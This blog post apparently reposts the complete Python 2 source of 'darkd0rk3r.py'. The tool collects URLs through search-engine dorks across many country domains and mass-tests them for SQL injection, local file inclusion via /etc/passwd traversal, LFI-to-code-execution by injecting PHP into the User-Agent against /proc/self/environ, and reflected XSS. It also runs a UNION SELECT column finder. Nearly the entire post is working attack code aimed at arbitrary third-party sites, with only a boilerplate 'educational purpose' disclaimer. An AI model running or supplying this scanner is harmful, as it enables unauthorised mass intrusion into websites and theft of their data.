Scan Dork From Python -| Blog Gila |- Blog GILA

Hi guys,

001 #!/usr/bin/python

002 # This was written for educational purpose and pentest only. Use it at your own risk.

003 # Author will be not responsible for any damage!

004 # !!! Special greetz for my friend sinner_01 !!!

005 # Toolname : darkd0rk3r.py

006 # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>

007 # Version : 0.8

008 # Greetz for rsauron and low1z, great python coders

009 # greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org

010 #

011

012 import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess

013 from random import choice

014

015 # Colours

016 W = "\033[0m";

017 R = "\033[31m";

018 G = "\033[32m";

019 O = "\033[33m";

020 B = "\033[34m";

021

022

023 # Banner

024 def logo():

025 print R+"\n|---------------------------------------------------------------|"

026 print "| b4ltazar[@]gmail[dot]com |"

027 print "| 08/2012 darkd0rk3r.py v.0.8 |"

028 print "| b4ltazar.wordpress.com & ljuska.org |"

029 print "| |"

030 print "|---------------------------------------------------------------|\n"

031 print W

032

033 if sys.platform == 'linux' or sys.platform == 'linux2':

034 subprocess.call("clear", shell=True)

035 logo()

036

037 else:

038 subprocess.call("cls", shell=True)

039 logo()

040

041 log = "darkd0rk3r-sqli.txt"

042 logfile = open(log, "a")

043 lfi_log = "darkd0rk3r-lfi.txt"

044 lfi_log_file = open(lfi_log, "a")

045 rce_log = "darkd0rk3r-rce.txt"

046 rce_log_file = open(rce_log, "a")

047 xss_log = "darkd0rk3r-xss.txt"

048 xss_log_file = open(xss_log, "a")

049

050 threads = []

051 finallist = []

052 vuln = []

053 col = []

054 arg_end = "--"

055 arg_eva = "+"

056 colMax = 10

057 gets = 0

058 timeout = 300

059 socket.setdefaulttimeout(timeout)

060

061

062

063

064 lfis = ["/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]

065

066 xsses = ["<h1>XSS by baltazar</h1>","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"]

067

068 sqlerrors = {'MySQL': 'error in your SQL syntax',

069 'MiscError': 'mysql_fetch',

070 'MiscError2': 'num_rows',

071 'Oracle': 'ORA-01756',

072 'JDBC_CFM': 'Error Executing Database Query',

073 'JDBC_CFM2': 'SQLServer JDBC Driver',

074 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',

075 'MSSQL_Uqm': 'Unclosed quotation mark',

076 'MS-Access_ODBC': 'ODBC Microsoft Access Driver',

077 'MS-Access_JETdb': 'Microsoft JET Database',

078 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',

079 'Server Error' : 'Server Error',

080 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',

081 'Invalid Querystring' : 'Invalid Querystring',

082 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',

083 'VBScript Runtime' : 'VBScript Runtime',

084 'ADODB.Field' : 'ADODB.Field',

085 'BOF or EOF' : 'BOF or EOF',

086 'ADODB.Command' : 'ADODB.Command',

087 'JET Database' : 'JET Database',

088 'mysql_fetch_array()' : 'mysql_fetch_array()',

089 'Syntax error' : 'Syntax error',

090 'mysql_numrows()' : 'mysql_numrows()',

091 'GetArray()' : 'GetArray()',

092 'FetchRow()' : 'FetchRow()',

093 'Input string was not in a correct format' : 'Input string was not in a correct format'}

094

095

096 header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',

097 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',

098 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',

099 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',

100 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',

101 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',

102 'Microsoft Internet Explorer/4.0b1 (Windows 95)',

103 'Opera/8.00 (Windows NT 5.1; U; en)',

104 'amaya/9.51 libwww/5.4.0',

105 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',

106 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',

107 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',

108 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',

109 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',

110 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']

111

112

113 domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao',

114 'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb',

115 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo',

116 'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd',

117 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr',

118 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do',

119 'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi',

120 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf',

121 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs',

122 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu',

123 'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it',

124 'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn',

125 'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk',

126 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me',

127 'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr',

128 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc',

129 'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz',

130 'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn',

131 'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru',

132 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj',

133 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy',

134 'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm',

135 'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug',

136 'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi',

137 'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com',

138 'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel',

139 'name', 'aero', 'asia', 'cat', 'coop', 'jobs', 'mobi', 'museum',

140 'pro', 'travel'],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr',

141 'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil',

142 'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia',

143 'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']}

144

145

146

147

148

149 def search(inurl, maxc):

150 urls = []

151 for site in sitearray:

152 page = 0

153 try:

154 while page < int(maxc):

155 jar = cookielib.FileCookieJar("cookies")

156 query = inurl+"+site:"+site

157 results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'

158 request_web =urllib2.Request(results_web)

159 agent = random.choice(header)

160 request_web.add_header('User-Agent', agent)

161 opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

162 text = opener_web.open(request_web).read()

163 stringreg = re.compile('(?<=href=")(.*?)(?=")')

164 names = stringreg.findall(text)

165 page += 1

166 for name in names:

167 if name not in urls:

168 if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):

169 pass

170 elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):

171 pass

172 else:

173 urls.append(name)

174 percent = int((1.0*page/int(maxc))*100)

175 urls_len = len(urls)

176 sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))

177 sys.stdout.flush()

178 except(KeyboardInterrupt):

179 pass

180 tmplist = []

181 print "\n\n[+] URLS (unsorted): ",len(urls)

182 for url in urls:

183 try:

184 host = url.split("/",3)

185 domain = host[2]

186 if domain not in tmplist and "=" in url:

187 finallist.append(url)

188 tmplist.append(domain)

189

190 except:

191 pass

192 print "[+] URLS (sorted) : ",len(finallist)

193 return finallist

194

195

196 class injThread(threading.Thread):

197 def __init__(self,hosts):

198 self.hosts=hosts

199 self.fcount = 0

200 self.check = True

201 threading.Thread.__init__(self)

202

203 def run (self):

204 urls = list(self.hosts)

205 for url in urls:

206 try:

207 if self.check == True:

208 ClassicINJ(url)

209 else:

210 break

211 except(KeyboardInterrupt,ValueError):

212 pass

213 self.fcount+=1

214

215 def stop(self):

216 self.check = False

217

218 class lfiThread(threading.Thread):

219 def __init__(self,hosts):

220 self.hosts=hosts

221 self.fcount = 0

222 self.check = True

223 threading.Thread.__init__(self)

224

225 def run (self):

226 urls = list(self.hosts)

227 for url in urls:

228 try:

229 if self.check == True:

230 ClassicLFI(url)

231 else:

232 break

233 except(KeyboardInterrupt,ValueError):

234 pass

235 self.fcount+=1

236

237 def stop(self):

238 self.check = False

239

240 class xssThread(threading.Thread):

241 def __init__(self,hosts):

242 self.hosts=hosts

243 self.fcount = 0

244 self.check = True

245 threading.Thread.__init__(self)

246

247 def run (self):

248 urls = list(self.hosts)

249 for url in urls:

250 try:

251 if self.check == True:

252 ClassicXSS(url)

253 else:

254 break

255 except(KeyboardInterrupt,ValueError):

256 pass

257 self.fcount+=1

258

259 def stop(self):

260 self.check = False

261

262

263 def ClassicINJ(url):

264 EXT = "'"

265 host = url+EXT

266 try:

267 source = urllib2.urlopen(host).read()

268 for type,eMSG in sqlerrors.items():

269 if re.search(eMSG, source):

270 print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"

271 logfile.write("\n"+host)

272 vuln.append(host)

273 col.append(host)

274 break

275

276

277 else:

278 pass

279 except:

280 pass

281

282

283 def ClassicLFI(url):

284 lfiurl = url.rsplit('=', 1)[0]

285 if lfiurl[-1] != "=":

286 lfiurl = lfiurl + "="

287 for lfi in lfis:

288 try:

289 check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()

290 if re.findall("root:x", check):

291 print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"

292 lfi_log_file.write("\n"+lfiurl+lfi)

293 vuln.append(lfiurl+lfi)

294 target = lfiurl+lfi

295 target = target.replace("/etc/passwd","/proc/self/environ")

296 header = "<? echo md5(baltazar); ?>"

297 try:

298 request_web = urllib2.Request(target)

299 request_web.add_header('User-Agent', header)

300 text = urllib2.urlopen(request_web)

301 text = text.read()

302 if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):

303 print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"

304 rce_log_file.write("\n",target)

305 vuln.append(target)

306 except:

307 pass

308

309 except:

310 pass

311

312 def ClassicXSS(url):

313 for xss in xsses:

314 try:

315 source = urllib2.urlopen(url+xss.replace("\n","")).read()

316 if re.findall("XSS by baltazar", source):

317 print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"

318 xss_log_file.write("\n"+url+xss)

319 vuln.append(url+xss)

320 except:

321 pass

322

323 def injtest():

324 print B+"\n[+] Preparing for SQLi scanning ..."

325 print "[+] Can take a while ..."

326 print "[!] Working ...\n"

327 i = len(usearch) / int(numthreads)

328 m = len(usearch) % int(numthreads)

329 z = 0

330 if len(threads) <= numthreads:

331 for x in range(0, int(numthreads)):

332 sliced = usearch[x*i:(x+1)*i]

333 if (z<m):

334 sliced.append(usearch[int(numthreads)*i+z])

335 z +=1

336 thread = injThread(sliced)

337 thread.start()

338 threads.append(thread)

339 for thread in threads:

340 thread.join()

341

342 def lfitest():

343 print B+"\n[+] Preparing for LFI - RCE scanning ..."

344 print "[+] Can take a while ..."

345 print "[!] Working ...\n"

346 i = len(usearch) / int(numthreads)

347 m = len(usearch) % int(numthreads)

348 z = 0

349 if len(threads) <= numthreads:

350 for x in range(0, int(numthreads)):

351 sliced = usearch[x*i:(x+1)*i]

352 if (z<m):

353 sliced.append(usearch[int(numthreads)*i+z])

354 z +=1

355 thread = lfiThread(sliced)

356 thread.start()

357 threads.append(thread)

358 for thread in threads:

359 thread.join()

360

361 def xsstest():

362 print B+"\n[+] Preparing for XSS scanning ..."

363 print "[+] Can take a while ..."

364 print "[!] Working ...\n"

365 i = len(usearch) / int(numthreads)

366 m = len(usearch) % int(numthreads)

367 z = 0

368 if len(threads) <= numthreads:

369 for x in range(0, int(numthreads)):

370 sliced = usearch[x*i:(x+1)*i]

371 if (z<m):

372 sliced.append(usearch[int(numthreads)*i+z])

373 z +=1

374 thread = xssThread(sliced)

375 thread.start()

376 threads.append(thread)

377 for thread in threads:

378 thread.join()

379

380 menu = True

381 new = 1

382 while menu == True:

383 if new == 1:

384 threads = []

385 finallist = []

386 vuln = []

387 col = []

388

389 stecnt = 0

390 for k,v in domains.items():

391 stecnt += 1

392 print str(stecnt)+" - "+k

393 sitekey = raw_input("\nChoose your target : ")

394 sitearray = domains[domains.keys()[int(sitekey)-1]]

395

396

397 inurl = raw_input('\nEnter your dork : ')

398 numthreads = raw_input('Enter no. of threads : ')

399 maxc = raw_input('Enter no. of pages : ')

400 print "\nNumber of SQL errors :",len(sqlerrors)

401 print "Number of LFI paths :",len(lfis)

402 print "Number of XSS cheats :",len(xsses)

403 print "Number of headers :",len(header)

404 print "Number of threads :",numthreads

405 print "Number of pages :",maxc

406 print "Timeout in seconds :",timeout

407 print ""

408

409 usearch = search(inurl,maxc)

410 new = 0

411

412 print R+"\n[0] Exit"

413 print "[1] SQLi Testing"

414 print "[2] SQLi Testing with Column Finder"

415 print "[3] LFI - RCE Testing"

416 print "[4] XSS Testing"

417 print "[5] SQLi and LFI - RCE Testing"

418 print "[6] SQLi and XSS Testing"

419 print "[7] LFI -RCE and XSS Testing"

420 print "[8] SQLi,LFI - RCE and XSS Testing"

421 print "[9] Save valid urls to file"

422 print "[10] Print valid urls"

423 print "[11] Found vuln in last scan"

424 print "[12] New Scan\n"

425

426 chce = raw_input(":")

427 if chce == '1':

428 injtest()

429

430 if chce == '2':

431 injtest()

432 print B+"\n[+] Preparing for Column Finder ..."

433 print "[+] Can take a while ..."

434 print "[!] Working ..."

435 # Thanks rsauron for schemafuzz

436 for host in col:

437 print R+"\n[+] Target: ", O+host

438 print R+"[+] Attempting to find the number of columns ..."

439 print "[+] Testing: ",

440 checkfor = []

441 host = host.rsplit("'", 1)[0]

442 sitenew = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva

443 makepretty = ""

444 for x in xrange(0, colMax):

445 try:

446 sys.stdout.write("%s," % (x))

447 sys.stdout.flush()

448 darkc0de = "dark"+str(x)+"c0de"

449 checkfor.append(darkc0de)

450 if x > 0:

451 sitenew += ","

452 sitenew += "0x"+darkc0de.encode("hex")

453 finalurl = sitenew+arg_end

454 gets += 1

455 source = urllib2.urlopen(finalurl).read()

456 for y in checkfor:

457 colFound = re.findall(y, source)

458 if len(colFound) >= 1:

459 print "\n[+] Column length is:", len(checkfor)

460 nullcol = re.findall(("\d+"), y)

461 print "[+] Found null column at column #:", nullcol[0]

462 for z in xrange(0, len(checkfor)):

463 if z > 0:

464 makepretty += ","

465 makepretty += str(z)

466 site = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva+makepretty

467 print "[+] SQLi URL:", site+arg_end

468 site = site.replace(","+nullcol[0]+",",",darkc0de,")

469 site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")

470 site = site.replace(","+nullcol[0],",darkc0de")

471 print "[+] darkc0de URL:", site

472 print "[-] Done!\n"

473

474 except(KeyboardInterrupt, SystemExit):

475 raise

476 except:

477 pass

478

479 print "\n[!] Sorry column length could not be found\n"

480 ###########

481

482

483

484 if chce == '3':

485 lfitest()

486

487 if chce == '4':

488 xsstest()

489

490 if chce == '5':

491 injtest()

492 lfitest()

493

494 if chce == '6':

495 injtest()

496 xsstest()

497

498 if chce == '7':

499 lfitest()

500 xsstest()

501

502 if chce == '8':

503 injtest()

504 lfitest()

505 xsstest()

506

507 if chce == '9':

508 print B+"\nSaving valid urls ("+str(len(finallist))+") to file"

509 listname = raw_input("Filename: ")

510 list_name = open(listname, "w")

511 finallist.sort()

512 for t in finallist:

513 list_name.write(t+"\n")

514 list_name.close()

515 print "Urls saved, please check", listname

516

517 if chce == '10':

518 print W+"\nPrinting valid urls:\n"

519 finallist.sort()

520 for t in finallist:

521 print B+t

522

523 if chce == '11':

524 print B+"\nVuln found ",len(vuln)

525

526 if chce == '12':

527 new = 1

528 print W+""

529

530 if chce == '0':

531 print R+"\n[-] Exiting ..."

532 mnu = False

533 print W

534 sys.exit(1) Created By

Terimakasih telah membaca artikel Scan Dork From Python ,semoga bermanfaat!

15 Okt 2012

Scan Dork From Python

Terbaru

Terbanyak Di kunjungi

Kategori

Populer

----------welcome to blog gila----------